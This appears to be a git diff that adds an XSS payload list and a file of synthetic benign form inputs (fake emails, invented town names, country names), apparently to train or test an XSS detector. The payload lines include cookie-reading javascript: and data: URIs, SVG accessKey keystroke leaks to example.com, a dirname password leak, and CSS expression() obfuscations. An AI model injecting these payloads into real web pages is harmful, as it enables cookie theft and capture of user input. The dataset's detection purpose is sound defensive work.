+xss,'<br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>' +xss,'feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>' +xss,'feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b>' +xss,'<br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>' +xss,'<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div>' +xss,'<div id="132"><!doctype html>' +xss,'<form>' +xss,'<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>' +xss,'<br>' +xss,'<input name="secret" type="password">' +xss,'</form>' +xss,'<!-- injection --><svg height="50px">' +xss,'<image xmlns:xlink="http://www.w3.org/1999/xlink">' +xss,'<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />' +xss,'<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" />' +xss,'<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" />' +xss,'<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" />' +xss,'</image>' +xss,'</svg>//["'`-->]]>]</div>' +xss,'<div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div>' +xss,'<div id="134"><xmp>' +xss,'<%' +xss,'</xmp>' +xss,'<img alt='%></xmp><img src=xx:x onerror=aler' +xss,'*{color:red}</style>//["'`-->]]>]</div>' +xss,'<div id="135"><?xml-stylesheet type="text/xsl" href="#" ?>' +xss,'<stylesheet xmlns="http://www.w3.org/TR/WD-xsl">' +xss,'<template match="/">' +xss,'<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>' +xss,'<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>' +xss,'</template>' +xss,'</stylesheet>//["'`-->]]>]</div>' +xss,'<div id="136"><form action="" method="post">' +xss,'<input name="username" value="admin" />' +xss,'<input name="password" type="password" value="secret" />' +xss,'<input name="injected" value="injected" dirname="password" />' +xss,'<input type="submit">' +xss,'</form>//["'`-->]]>]</div>' +xss,'<div id="137"><svg>' +xss,'<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?">' +xss,'<circle r="400"></circle>' +xss,'<animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" />' +xss,'</a>//["'`-->]]>]</div>' +xss,'<div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined' +xss,'<marquee loop=1 width=0 onfinish=alert(1)>' +xss,'<marguee/onstart=alert(1)>' +xss,'<svg onload=(alert)(1)>' +xss,'<script>$=1,alert($)</script>' +xss,'<form><button formaction="javascript:alert(1)">' +xss,'<div style=xss:expression(alert(1))>' +xss,'<div style=xss:expression(1)-alert(1)>' +xss,'<div style=xss:expressio\6e(alert(1))>' +xss,'<div style=xss:expressio\006e(alert(1))>' +xss,'<div style=xss:expressio\00006e(alert(1))>' +xss,'<div style=xss:expressio\6e(alert(1))>' +xss,'<div style=xss:expressio&#x5c;6e(alert(1))>' diff --git a/datasets/regular_web_form_data.txt b/datasets/regular_web_form_data.txt new file mode 100644 index 0000000..cd4356b --- /dev/null +++ b/datasets/regular_web_form_data.txt @@ -0,0 +1,10200 @@ +achang@green.info +thull@howard-snow.com +juancampos@lloyd.org +kyleblair@rivera.com +tammywoods@green.com +cortezraymond@garrett.com +jessicapadilla@lee.com +lindathomas@west.net +jrodriguez@mann-kelley.net +tamaramorrison@roberts.com +kellylopez@johnson.com +rjones@mcdowell.com +hmassey@boyd-young.com +criley@keller-davies.com +nguyendarrell@mccoy.com +thorntonnathan@cook.com +melissarobinson@walters.com +martinezjacob@wilson.com +jacobsjames@robbins.com +gilesandrew@oliver-huff.com +charlesturner@white-gordon.com +lyonspeter@howard-dennis.org +heidiharris@kramer.com +alyssa19@wade-smith.biz +deborah64@castro.info +rogersbrandon@taylor-gill.info +chelsea59@nash.biz +smithjames@moore-walker.info +rpage@baxter.org +tbarton@martin.com +seandyer@munoz.com +mary06@dunn.com +valeriemorales@butler.com +leecharlene@russo.com +alvarezsandra@miller.com +dennis85@wiggins.com +williamserin@edwards.com +djoseph@graham.biz +alan24@morgan-richardson.com +kimberly00@martin-holden.com +ralph82@wilson-cross.com +hayden81@powell-murphy.biz +garciaregina@rogers-yates.com +mendozaholly@johnson-rogers.com +courtneybennett@miller.com +cruzcorey@stone.org +rodneyrichardson@richards-jackson.com +danny08@goodwin-harris.info +pscott@shea.org +danielellis@payne-hernandez.org +zhernandez@frazier.com +obolton@baxter.com +janice55@warren.org +meganaguilar@mccarthy.net +jonesdavid@smith-anthony.com +laurenmelton@schmitt-wagner.net +berryerika@chang.com +amanda96@bruce-compton.org +melissayates@mcclure.org +marvin74@barton-cruz.biz +martinselena@mitchell.com +olsondonald@love.com +djohnson@ellis-garcia.com +johnsonchristina@nguyen.com +xlogan@rodriguez-brown.info +debra94@mullen.com +stonekristen@johnson.info +katherine75@jones.info +rachel89@liu.net +hhunter@simmons.biz +wallsrobert@perry.com +ajordan@crawford.com +gomezdavid@johnson.com +chad23@harris.com +carterhannah@hall.info +jasmine42@levy.com +swoodward@fields.com +eric22@stewart.com +kellybarnes@callahan.com +emiller@fisher.biz +brittanyevans@miller-wallace.com +bennettalan@valenzuela.info +clementslaura@rodriguez-jacobs.com +lhebert@reynolds-wright.info +sharon25@welch-miller.com +aaron79@smith-evans.com +rogerpotter@gregory.net +bramirez@nelson.com +scottalicia@mckinney.com +monica39@johnson.com +david32@perry.com +audreyburton@garcia.com +scott92@martinez.biz +igarza@barnett.biz +thomasneal@vasquez-mullen.info +douglas70@lewis.com +mcdanielchristopher@middleton.com +keymorgan@carter.org +james67@rivera.biz +sethfletcher@stewart.com +fsimmons@blair-pope.info +brendawilliams@johnson-schultz.com +brian23@evans.com +robert08@huber.biz +thenry@lewis-adams.com +martinadam@smith.com +ogrant@lee-franklin.org +nortonmarcus@barry-scott.net +leechristopher@reed.com +zachary64@cooper-marquez.com +sarah10@simpson-kim.biz +hstevens@miller.com +nhenson@salazar-meyers.net +lwilliams@burns.com +luis61@lam.com +dpalmer@walters.org +thompsonrobert@mitchell.com +htrevino@brewer-wilson.org +jerome84@singh.com +emily35@castillo.com +michael02@moore-thompson.com +kathyharrington@hudson-dominguez.com +jessicacabrera@gomez-garza.info +jensenanthony@howard.com +donnasimpson@castillo.com +cassandrawarner@floyd-cruz.com +benjaminbarber@cooper.com +max24@kelly.com +michaelhenry@johnson.com +soniamurphy@cooper.biz +patriciarobinson@thomas-collins.com +areyes@ferguson-ballard.info +cunninghamdavid@jackson-mason.org +christopheryoung@wright.com +jennifersimmons@garcia.org +kinglinda@bennett.info +howardemily@young-kelly.biz +joseph76@collins.net +xmadden@duncan.info +zgriffith@crawford-smith.com +erin94@gill.biz +jason95@willis.net +francisco25@wilkins.com +michael45@patton-burke.com +kramerashley@martinez-noble.info +julie31@boyle.net +bryanfowler@rodriguez.org +rfischer@mitchell-patterson.com +amanda85@lee-patton.com +bradyeric@miles.info +hoffmanrobert@lindsey.com +erinmccoy@graves.org +joshuaduffy@miller-west.info +rubiofrank@reilly.biz +johnny59@davis-johnson.com +james66@rowe-garrett.biz +aguilarmichael@martinez.com +hwells@williams.com +adam31@fernandez.com +philip24@lambert-larson.biz +william22@lozano.com +colonhayley@welch.org +millergreg@harris-green.com +zachary72@tran-johnson.org +darlenejohnson@meyers-jones.info +lisaboyd@cook.net +stephenslori@smith-hampton.com +klawson@rogers-gray.com +taylorsara@gross.com +bradleybrewer@collins.com +samantha16@alexander.org +emily97@white-chavez.com +stacybrown@martinez.com +richardvaughn@morris.info +dmiller@atkins.com +wongcody@cook.info +moorezachary@moyer-smith.com +sheryldominguez@thompson.com +sonya76@perez.com +george35@martin.info +nancy26@townsend.biz +zoesmith@hicks-johnson.com +kimberlynunez@french-barnes.org +jennifer25@robinson.org +tammy66@ruiz.biz +deannasanders@jones.net +amy99@mcdowell-hill.org +michelle61@rich.com +zsimon@middleton-reeves.org +vmartin@jenkins-lawrence.com +mahoneymichael@howard.com +nataliescott@silva.com +ajohnson@brooks-clark.com +danielkelly@jordan.info +mayjasmine@strickland.net +garyclark@johnson.info +rachel94@mcguire.biz +rachel58@patel-thomas.biz +jimmy65@fry-hunt.biz +rhess@hernandez.org +terrydeborah@larson.net +adamsjessica@bennett.com +staffordlisa@flores-lowe.com +elizabeth32@arnold.net +anthonyday@johns.biz +samuelsutton@smith-taylor.biz +nicolecunningham@noble-miller.org +gcook@williams-harvey.com +zpierce@baker-hall.com +kevinlynch@bryant.info +aknight@davis.com +michaeldavis@shields.net +adrianatkins@lyons.com +xhansen@brennan-jennings.com +tylerjoyce@walker-simpson.net +christopher49@perez-richardson.biz +jesseboyle@parsons.com +xsalazar@morales.info +dianabrooks@reynolds-howard.biz +michelle74@griffin.com +sarahmorgan@rodriguez.biz +kpalmer@walker.com +april01@stewart-macdonald.com +kjoyce@russell.com +gregory25@hall.com +inichols@underwood.com +figueroajames@meyer.biz +herrerasara@hebert.info +grahampatrick@gilbert.com +jane57@taylor.com +nelsonheather@barton.com +robertmason@garcia.info +jwhite@anderson-scott.com +lori37@bell.com +acummings@sullivan.biz +jonalvarez@alexander.info +tanyaboyd@lopez.com +moorebenjamin@trujillo.com +kcrawford@williams-vaughan.com +jenniferwhite@marquez.org +knolan@george.com +ustein@simon.com +nsawyer@guerrero.net +omiddleton@mcclure-morgan.com +nathanbridges@kim.info +thomaskaren@finley.info +patriciapadilla@sullivan.biz +ofernandez@yu.com +iparker@jones.com +roberttodd@miller-johnson.com +matthewssusan@hernandez-green.org +oramirez@cruz-hunter.com +madisonbaker@williams.org +hbrown@graham-cruz.com +hamiltonelizabeth@gill.com +owright@baker-wilson.com +christina38@brown.info +walshjonathan@cooper.org +wmoses@king.net +callahanbrenda@johnson-pittman.com +colin32@alvarado.info +eric58@robinson.com +ann01@weiss.com +milleralexis@jackson.com +michelle16@patel.info +grant36@hale.com +pittsdonna@levine-valdez.com +loganjohn@black.biz +ocampbell@tapia-lozano.net +tpreston@henderson.net +halllindsey@johnson-miller.com +rebeccahorne@barry.net +pmartinez@campbell-powell.info +martinolivia@howard.com +jacobbird@johnson.biz +johncastro@maldonado.com +bowenkristy@brown.biz +ilewis@snyder.com +smithjulie@reese.com +qdudley@scott-jones.com +joycehodge@dixon.info +shannonstrickland@taylor.com +michaelhoward@shaw-barker.com +mendozajessica@franklin.info +scott74@gentry.biz +sriley@evans.com +ryanbaker@hicks.net +qstark@turner-escobar.net +clarkejames@ellis-jones.com +foleytiffany@petersen.com +rebeccastanley@cain.com +lawsonsarah@rivers-young.info +michele19@casey-lyons.com +wheelerjoseph@clark.com +tylerhernandez@wagner.com +brownphyllis@lucas.com +barnesmartin@howe.com +lesliewhitney@hill.com +paula17@villanueva.com +afranklin@moore.com +robersonjulie@phillips-daniel.biz +joshua15@bryan.org +beltranstephanie@russell.com +crystal21@myers.com +robertgillespie@williams.com +richard80@copeland.com +briannajackson@ray.com +jason00@ayala.com +kendrawall@taylor.com +mary59@miller.com +frivera@nichols-miller.com +zreyes@castillo.com +dawnpoole@edwards.com +hnewman@jones.info +uvargas@caldwell.com +hardykimberly@peterson-hunt.com +alvarezmicheal@sanchez.com +bernard52@adams-webb.biz +shepherdkayla@pena.com +juareztimothy@cuevas.com +blewis@gibson.com +ustewart@bradley-grimes.com +xmyers@phillips-lewis.com +sheri39@hanson-thomas.com +meganscott@herrera.org +englishsean@holt.com +jenniferdavis@conway-carter.com +michaelrussell@smith.com +gmiller@barker-barnes.com +hbrown@cook.com +aparker@brooks-shah.com +cowankristy@hunter.org +stephanie91@young.com +cabreramonica@anderson.org +joshuamoore@garza.com +nancyscott@thomas-jensen.com +taylormegan@dickson-white.org +belldonna@martinez.org +latoya30@holloway.org +barnesdustin@williams.com +cstewart@shepard.com +craighenry@ryan-costa.com +andrea12@wilson-lawrence.com +jenniferhardin@thomas-green.net +kathleenthompson@baker.biz +coopermichelle@bowen.net +dianatorres@black-johnston.biz +taylormyers@davis.com +kcurry@harris.com +jrussell@fox.info +leemichele@anderson.org +pburke@chambers-ruiz.org +belltina@park.com +rlewis@petersen.com +mruiz@huff-roberts.com +natalie19@serrano.org +hallderek@vincent.com +zacharyschultz@byrd.com +rebecca33@boyd-coleman.biz +cjohnson@roberts.com +mariaburns@richards.biz +joyce12@alexander.biz +maryevans@berry-fleming.com +snyderabigail@valencia.org +owensjordan@scott.com +sheltonbianca@chan.com +perezjasmine@wang.com +carlosramirez@dean-ray.com +tbraun@thomas.com +marvin66@terrell.com +kimberlywatkins@wright.com +aflores@fisher-stone.com +jennifer86@evans.com +laurengreen@miller-thomas.com +cchurch@welch.net +kmcdonald@holmes.com +mzimmerman@beard-baker.biz +charlotteadams@benson.com +jeanette10@collins-howell.com +robert21@howard.info +wthompson@sweeney-ortiz.org +downsangela@anderson-smith.net +ppena@walsh-davis.com +carolyn44@martinez.com +daviskaren@bradford-sanchez.org +kgreen@ross-garcia.com +jenny48@mason.com +gardnerkeith@sanchez.com +dmartin@strong-benson.info +castroallen@garcia.biz +jonathanreyes@brewer-wagner.com +ronalddrake@fisher.com +thomas74@nelson-martin.com +bmorris@wells-kramer.com +andrewgarcia@holmes.biz +andrea07@mcclain-conner.info +alexander93@henry.com +naustin@patterson.info +jocelyn03@phillips.biz +spadilla@brown-williams.com +yschneider@dominguez.info +ospencer@reid-nunez.com +bcraig@klein-dickson.org +terry54@meyers-willis.com +benjamin77@jones-perez.com +nicholasweber@white.com +thompsoncassandra@banks.com +lleonard@sanders-collins.net +mooreeric@guerrero.com +kevin09@rivera-murray.com +jeffrey74@pennington.com +nortonchristopher@phillips.com +webereric@parrish.com +mezaann@jones.org +harriscraig@reynolds-wilson.info +ambertaylor@blair-henderson.com +simssusan@suarez.biz +allison58@armstrong.org +hernandezrichard@moss-dunlap.net +andrew02@yang-schwartz.com +darrellburns@estrada-hill.com +monicajackson@bell.com +qthomas@lopez-wilson.com +lauren14@grant-johnson.com +phillipburch@medina-osborne.com +brandon41@wong-smith.com +dianadaugherty@white.net +jacksonjames@bishop.com +adam92@jackson-sullivan.org +robinjohnson@mullins.net +vwatkins@diaz-wise.com +ecox@bowen.biz +estradasarah@goodman.com +cjames@le.com +turnervanessa@garcia.com +raymondboyd@fisher.info +kingleslie@griffith-bennett.net +porterdebbie@harris.biz +sanfordrobert@crane.com +vasquezlisa@bailey.info +lindafischer@kelly.com +kristinachavez@bird.com +jdalton@patton-bruce.info +jenna30@nielsen-baker.net +parkerdavid@thomas.com +johnsonthomas@mills.com +christopher52@durham-williams.com +weberdaniel@parker.com +osullivan@davis.info +ycaldwell@patterson.biz +josephpacheco@morris-carter.info +john72@morgan.net +ldaniel@guerrero.com +elaine11@morris-murphy.com +lopezdebra@lopez.com +marquezpaula@rodriguez.info +talvarado@brown.com +conleycathy@campbell.org +robinsonjulie@bruce-powell.com +wpark@sims-lucas.biz +patricia22@miller.com +qbooth@rivera.com +ilamb@thompson-perez.com +martinezkathy@garcia-walton.com +dennis39@edwards.info +kim09@howell.net +collinsgordon@gibson.net +uberg@flynn.info +aprilrojas@hester.com +millermelissa@hubbard.com +rebecca31@williams.com +hdowns@gregory.biz +carlsonjeffrey@blackwell.com +mhernandez@riley.com +nicole75@gutierrez.com +vmoody@lambert-spears.com +lewisregina@mullins-powell.com +thomastapia@weber.com +wayne82@bond.com +hschmitt@black.com +warebrittany@hart.com +cory67@rogers.com +kathrynhudson@mitchell.com +shelbyanderson@baker.info +amy16@brown.biz +leahhowe@martinez.com +patrickklein@rivera-spence.net +sherry09@moore.org +erin71@fuentes-nelson.com +sullivanandrew@shepherd-anderson.com +kenneth27@smith-nguyen.com +taguirre@crane.com +ghancock@kane-mclean.com +vunderwood@holt.com +lisadavis@harris.com +leonnicholas@kelly-king.net +collinssean@liu.info +boydcaitlin@ritter-marsh.com +stephaniehart@owen-thompson.com +lisaarroyo@fitzgerald-moore.com +michellejohnson@morrow.biz +jonesashley@jones.net +mejialisa@cannon.org +sawyersamuel@lewis-brown.com +banksbrooke@vasquez.com +bailey91@watson.com +diana83@torres.com +margaret51@elliott-bell.com +osmith@hudson-carter.com +hannahgibson@wong.com +andersonpatrick@gross.net +johnsonblake@velasquez-jackson.biz +santiagocrystal@harris.com +perrywilliam@williams.com +jasongonzalez@todd-rivera.com +henryle@brown-reyes.com +ymartin@ortiz.com +sstephenson@ellison-schneider.net +jasonross@armstrong.net +hernandezfrederick@flores.org +amyscott@taylor-robertson.info +kimberly03@adams.com +swatson@forbes.com +justin53@krause.com +qmartinez@jackson.com +nicholsgail@ballard-harris.com +roachdaniel@craig-gomez.com +mitchellmelanie@blake.com +chrisowen@simmons-galvan.com +stevenburton@anderson.info +lorraine47@campbell.com +ewatkins@melton.com +colemancourtney@estes.org +powelljudy@richardson.com +nicholsdustin@washington-sanchez.com +teresawhite@dillon.com +curtismcgee@cordova.net +nmitchell@clark.biz +william53@strong.com +clloyd@davis.com +scott55@sanchez.com +zharris@carpenter.com +edwardsryan@conley.net +tamara53@miller.com +brownjoshua@lewis-swanson.info +mooreaaron@esparza.com +michellecrawford@knight-brooks.net +tricia79@carey.com +coreygarcia@castro.org +cchavez@smith-jensen.net +jacqueline32@evans.net +ellisashley@baker-bates.com +ashley48@chavez-garcia.org +marcus16@paul-pacheco.com +grantashley@smith.info +blackrebecca@yang-hill.net +kristen43@morales.com +blakebarbara@pugh.com +paulbaker@ramirez-rangel.com +andreagibson@alvarez-miller.com +rowemichael@ward-reyes.com +teresaware@fernandez.com +katherine51@calderon-stokes.org +michaelgilbert@baker.com +danieldavidson@wallace-gray.org +nguyenerika@coffey-lewis.com +xgarcia@ross.com +scottalicia@mitchell.com +matthew08@ramos.com +hflores@baldwin.net +anthonyquinn@hernandez-baldwin.org +bfernandez@griffin.com +stephanie45@hill.com +wendygeorge@martin.com +christianhernandez@russell.com +max90@chapman.com +matthew95@brown-lopez.org +lauren38@burke.com +bonnie89@jensen.com +lbaker@barnes-davis.com +melissa25@townsend-brooks.com +molly52@rasmussen-gonzalez.org +briddle@flynn.com +anthonyortiz@stokes.biz +colleen36@pitts.com +fmendez@greene-mcgrath.biz +collinsgary@martinez-dean.com +iperez@smith-conway.com +glin@collins.info +josephbrooks@hanson-chung.com +walkerlaura@anderson-king.org +kellivalenzuela@cunningham-stanley.info +patricia79@marsh.biz +kyle24@green-mckinney.org +lauramurray@schwartz.info +doylemarie@harris-carter.biz +parkerfrank@parker.com +morganwatkins@brown.com +justin04@duffy.com +melissa88@johnson.biz +Nortonshire +North Ronald +New Valerieview +Pamelaberg +North Davidstad +West Lisahaven +Ryanville +New Angelaborough +Dawnfurt +North Natalie +North Danaborough +Hudsonville +Clarkland +Lake Kariberg +Joeburgh +Port Paul +Port James +Robertborough +Port Karenstad +Wendyhaven +South Beth +New Rebeccaville +Ryanville +North Markville +Tammyville +Port Kristin +North Peterberg +Jeffreybury +North Jennifer +South Thomasside +South Misty +New Lisa +Greggport +South Shannonfort +Kristiborough +Caldwellborough +Bellview +Jacksonside +Rodriguezbury +Evelynshire +Adrianmouth +South Jeffrey +Andrewton +Penningtontown +Lake Brandonchester +Shawntown +Rodriguezview +Port Matthewton +Desireeville +Lake Aliciaville +East Brittanychester +Craigburgh +Port Ericbury +South Samantha +Ricardoton +Rosalesbury +South Hannah +Jonesbury +East Ryanfort +Scottborough +New Wandafurt +Lake Trevor +North Natalie +Aguilarmouth +Riveraside +Port Caleb +West Sandy +Johnhaven +Nelsonfurt +Juliaborough +West Kevinville +South Sherri +West Jason +Camachobury +Alexandrastad +Royshire +Gonzalesville +Lake David +Josephfurt +Gonzalezburgh +South Ronaldchester +Williamsfort +North Austinside +East Rachel +Ronaldhaven +Sarahfort +Lake Charles +New James +North Patty +South Joshuahaven +South Stevenburgh +East Desireetown +Gomezmouth +Lake Nancyhaven +West Vanessa +South Michelefort +Port Javier +Port Amyville +Lake Kayla +Morrisbury +West Susanview +Lake Susanshire +North Stephen +South Michaelchester +North Jennifer +Port Ethan +West Cassie +North Jerryshire +Lisamouth +Joshuamouth +Tinaland +Herreraville +East Matthew +New John +Courtneyview +New Lindaland +Stanleyville +Stevensland +Lake Stanleyberg +Navarrochester +West Ronaldport +North Terri +Paynemouth +New Elizabeth +Port Jeffreyhaven +Taylorside +Lake Jamesport +West Brian +Heatherport +Andersonborough +Marissamouth +Aaronchester +Piercetown +Lake Dakota +Hallview +Masonshire +Lake Christopher +Lake Bobby +Baxterfurt +Markborough +New Brenda +Port Travisbury +West Ethan +South Jesse +East Randychester +East Christinaport +New Jamesfort +Rodriguezstad +Lake Stephenbury +Port Craigmouth +West Keith +Port Aaronchester +South James +Stoneburgh +North Alicia +Port Robertmouth +North Ashley +Stanleyborough +Byrdchester +East Johnport +Meganchester +Lake Taraland +Cartermouth +Sharonland +Jasonchester +Bellberg +Onealland +Deborahborough +Lake Alicia +East Jessicaside +Drakefort +Howardchester +Kevinton +North Johnland +South Terryborough +West Shelbyburgh +Obrienland +West Stephaniemouth +Port Jay +New Dominique +Port Shanemouth +Lake Charles +North Danafurt +Kristenfort +Laurenville +North Mitchell +Cristinaborough +New Zachary +Alexandraburgh +West Carlos +Robertchester +Alyssaville +Susanville +Port Brandon +New Josephshire +Joeltown +North Andrewmouth +Lake Jillland +Jonathanton +South Jesusview +East Amystad +Samanthaview +Brianchester +Shellystad +Mindytown +South Matthew +North Roger +East Gregorybury +West Stephaniehaven +Brownstad +South Brittany +South William +Faulknerborough +Theresamouth +Jennifertown +Goodwinville +Paulstad +East Melissa +Savannahfurt +Jenniferborough +North Lauren +East James +Lindseyfurt +Port Daleside +West Ericstad +Perryport +Tammychester +South Erica +Taylorside +Logantown +Lake Michael +North Jennifer +Michaelton +Lake Samuelside +North Spencer +East Charlesborough +West Nathan +Heathertown +Christinastad +South Christian +Knappberg +Alvarezside +Alexandertown +South Toddtown +New Brian +South Coryberg +Andrewsport +Smithside +New Jayburgh +South Tonya +Leehaven +New Thomasfort +Adamsmouth +Christinaside +Port Georgeton +Washingtonfort +Rogerton +Lake Sarahmouth +Tuckershire +New Courtneyborough +Natalieberg +Amandaburgh +Harrellville +Patrickland +Loriberg +Stokesfort +West Robertstad +Kellychester +Adrianmouth +Jasonmouth +South Michellechester +New Ronald +Lake Crystal +Florestown +Lake Kenneth +West Sarah +East Joe +Walshport +East Deborah +Smithberg +Davidsonland +West Meganview +New Stacey +Lake Melanie +Kevinburgh +Richardport +Shannonchester +New Shawn +Kathychester +Brownfort +Conniemouth +Diazmouth +North Marieside +Debraport +Richardmouth +West Erikachester +South Ambertown +Kimtown +Duffychester +Lake Jennifer +Zacharyside +New Amanda +Lake Danny +Wilsonton +Lucaston +Jenningsberg +New Denisechester +Timothyside +West Fernando +South Jodi +Port Joseph +Jacobshire +Edwardfurt +Port Jamie +Port Patrick +South Hannah +Lake Codyport +North Brian +South Kellyfort +Hillside +Amandaville +Vanessastad +New Tiffanyberg +Bishopshire +Roseview +Lake Derrick +East Claytonton +Lake William +Jessicaside +Stephanieville +Johnsonborough +Smithchester +North Tiffany +Robertport +South Steven +Abigailfort +Coreytown +Katherinemouth +New Joshua +South Henryfort +Danaberg +New Chad +New Gina +South Benjamin +Karenchester +Jeremyville +Gibbsfort +New Carolynshire +Mccartytown +Amandaville +Michelleville +Bobshire +Port Lance +West Lynn +South Maria +West Sandrashire +Harrischester +Russellfort +East Timothy +North Tyler +East Danhaven +Lake Joy +Port Ronniehaven +East Nicholasville +Atkinshaven +Lake Stephen +North Jamesville +New Shellyland +North Sherriburgh +Sharonshire +West Vanessa +Maryshire +West Joshua +Lake Dana +West Sarah +East David +Wellston +New Kylie +Coreyton +Johnsonborough +Chaseborough +New Shannonchester +Clarkland +Travismouth +Lake Antonioville +Gonzalesmouth +West Johnbury +Kristinehaven +Karenfurt +Heatherbury +West Andres +North Christopherstad +New Peterborough +South Shannon +New Clayton +Lake David +Marthaburgh +Lake Jordanchester +Taraberg +Lake Johnborough +Johnnyton +Port Eddiefort +Jasmineland +Port Jameshaven +East David +South Morgan +Garciastad +Stephenstown +Newmanshire +New Jenna +Mcleanhaven +Port Jennifer +West Jeremy +Liton +Dicksonmouth +New Manuelmouth +North Mark +Farmerside +Blackburnport +East Elizabeth +Wilsonborough +Robertsport +Adrianstad +Elizabethtown +South Nicoleton +North Brian +Larryland +Port Christopherbury +Port Marymouth +Cassandramouth +New Mariafort +Robertstown +West Michael +Georgeborough +Browntown +Oliviaside +Port Kent +Lake Richardview +North Bill +Lake Shaun +Port Jeffrey +Kennethfurt +New Thomasview +Arthurstad +Tiffanyshire +Jesusport +Aliciaport +Nicholefort +Lake Chaseborough +Lake Tracie +West Michelle +Lucaschester +Port Amber +Codyborough +Collinsshire +Port Robynton +Lake Heatherbury +Santosmouth +North Timothyfort +Ibarraton +Amyside +Watsonfort +Lake Amber +South Ashleybury +Lake Austin +South Matthewchester +Douglasfurt +Andersonburgh +North Nathaniel +Wilsonmouth +Carlaport +East Alexandriaview +North Stephen +Burgessburgh +Wesleytown +East Michael +West Linda +West James +Lake Nicholasport +Adamston +New Stephanieberg +New Aaron +New Lisa +Sandraburgh +New Tom +Lake Tylerport +Lake Jennifer +Davidborough +East Eric +Torresport +West Jamie +Mendozaburgh +Port Russell +Victoriastad +Stevenberg +Bennettchester +New Brent +Lake Timothyton +Howellburgh +North Candiceburgh +Port Anthonymouth +Lake Kevinfurt +South Richardmouth +Lake Samantha +East Misty +Colonfurt +Madisonside +Port Ashley +Shawnville +Port Kevin +Lake Vincent +Velazquezmouth +West Trevorville +East Elizabeth +Nicolebury +West Matthew +Port Stephanie +New Brandon +New Tracy +Grantfort +Harrismouth +Parkbury +New Jessicachester +Leslieville +Lake Mary +Fergusonton +Lopezfort +North John +New Anthony +Kimberlyport +Annettemouth +West Cynthialand +Hullmouth +Kristenville +Lake Allenside +Leahbury +North Anitaport +Cruzmouth +Brownbury +Hollymouth +Kramermouth +North Christianton +Michelleberg +West Brittanyview +Lake Zachary +Paulaborough +East Christina +Montoyaberg +West Juliefurt +Erikaport +Riveraborough +Port Katherinechester +West Charles +East Allison +Collinston +Riversmouth +Lake Warren +Millerbury +Fieldsside +Angelaton +West Cherylberg +East Darlene +Boyerhaven +East Elizabeth +North Tiffany +East Brendaland +East Johnborough +Richardchester +West Bridgetmouth +Martinezmouth +North Wandaport +Jenniferburgh +West Stephanieport +South Diane +Lake Tina +North David +South Brittany +Johnshaven +Port Aaron +North Timothyborough +Ashleyland +Lindaview +Ronaldfurt +Lake Justinside +Robertmouth +Bushton +South Jenniferville +East Johnville +Lake James +Ryanmouth +Harveyshire +Lewistown +West Judith +Kristinton +Clayside +Jasonport +East Brianton +Lake Carl +North Jenniferville +South Michelle +Nicaragua +Gambia +Antarctica (the territory South of 60 deg S) +Kazakhstan +Bosnia and Herzegovina +Comoros +New Caledonia +Saint Lucia +New Caledonia +Malawi +Monaco +American Samoa +Sri Lanka +Djibouti +Chad +Algeria +Montserrat +Kazakhstan +Estonia +Tunisia +French Guiana +Turkmenistan +Nepal +Netherlands +Taiwan +Cocos (Keeling) Islands +United States Minor Outlying Islands +Tanzania +Malawi +Netherlands Antilles +India +United Kingdom +Germany +Bosnia and Herzegovina +Chad +British Indian Ocean Territory (Chagos Archipelago) +Mexico +Cameroon +Lebanon +Cape Verde +Algeria +Netherlands +Antigua and Barbuda +French Southern Territories +Cuba +British Indian Ocean Territory (Chagos Archipelago) +Eritrea +Eritrea +Korea +Libyan Arab Jamahiriya +United Arab Emirates +Sri Lanka +Uzbekistan +Cyprus +Faroe Islands +Turks and Caicos Islands +Philippines +Netherlands +Moldova +Jordan +United Arab Emirates +Korea +Gabon +Kenya +Cyprus +Nepal +Mayotte +Italy +Botswana +Italy +India +Cook Islands +British Virgin Islands +Saint Vincent and the Grenadines +Haiti +Suriname +Norfolk Island +Pakistan +Pakistan +Mongolia +Ecuador +Turkmenistan +Palestinian Territory +Tokelau +Saint Pierre and Miquelon +Angola +Macao +Philippines +Bangladesh +Angola +Saint Barthelemy +Ireland +Guinea-Bissau +Cook Islands +Saint Barthelemy +Costa Rica +Greenland +Jordan +Botswana +Aruba +Tonga +Saint Kitts and Nevis +United Arab Emirates +Liechtenstein +Jersey +Tunisia +Gambia +Faroe Islands +Iceland +New Caledonia +Fiji +Hungary +Mozambique +Cape Verde +Niue +Brunei Darussalam +Andorra +Bangladesh +China +Armenia +Ghana +Trinidad and Tobago +New Caledonia +Haiti +Marshall Islands +Lao People's Democratic Republic +Taiwan +Jordan +Spain +Cook Islands +Iran +Bahamas +Guinea-Bissau +Seychelles +Philippines +Macao +Hungary +Palestinian Territory +Palestinian Territory +Kuwait +Montenegro +Netherlands Antilles +Iraq +Montenegro +El Salvador +Switzerland +Western Sahara +Netherlands Antilles +Namibia +Bouvet Island (Bouvetoya) +North Macedonia +China +France +Chile +North Macedonia +Palestinian Territory +Micronesia +Senegal +Mozambique +San Marino +Mauritius +Iraq +Equatorial Guinea +Burundi +Palau +Morocco +Belgium +Uganda +Georgia +Jordan +Gabon +Sao Tome and Principe +Jordan +Niger +Afghanistan +Luxembourg +Costa Rica +Malta +Timor-Leste +Finland +Somalia +Cook Islands +American Samoa +Sao Tome and Principe +New Caledonia +Peru +Malaysia +Gambia +Bhutan +Ireland +Saint Vincent 